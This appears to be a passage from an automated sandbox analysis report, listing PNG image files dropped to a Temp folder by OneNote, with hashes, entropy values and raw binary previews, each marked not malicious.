                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{4E869C6D-6CA5-4EB9-87AF-AE2DA89ED907}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13241
                                                                                                                                                    Entropy (8bit):7.931391290415517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                    MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                    SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                    SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                    SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{4F8EBC52-7DDC-44B6-A286-F30F71FF3FD3}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.943341403425058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                    MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                    SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                    SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                    SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{52BD32A9-8165-4689-A8E4-716B9AF418B0}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2270
                                                                                                                                                    Entropy (8bit):7.845368393313232
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                    MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                    SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                    SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                    SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{5371EF46-8412-45EF-B7EC-31E13AA9BC6E}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11886
                                                                                                                                                    Entropy (8bit):7.946442244439929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                    MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                    SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                    SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                    SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{55104584-63BB-482C-86C3-C28AE73F1B11}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{5589BEE2-ECE2-4A2D-8AC4-085C2EF35152}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{571B89A0-FF88-4410-8386-831D58453715}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{57501545-60CA-4E8F-9031-C81FD814DB9D}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4081
                                                                                                                                                    Entropy (8bit):7.943373267196131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                    MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                    SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                    SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                    SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{576861ED-7505-4CA6-BCD6-90BB2045D354}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4490
                                                                                                                                                    Entropy (8bit):7.928016176674318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                    MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                    SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                    SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                    SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{579900EB-EC14-498B-87BE-57A18E6191BB}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{588FA160-4304-4A41-BAB3-424583F3F3BC}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2332
                                                                                                                                                    Entropy (8bit):7.8822150338370776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                    MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                    SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                    SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                    SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{59128DE0-12F9-45BA-9695-5A0845EBE1CD}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13241
                                                                                                                                                    Entropy (8bit):7.931391290415517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                    MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                    SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                    SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                    SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                    Malicious:false
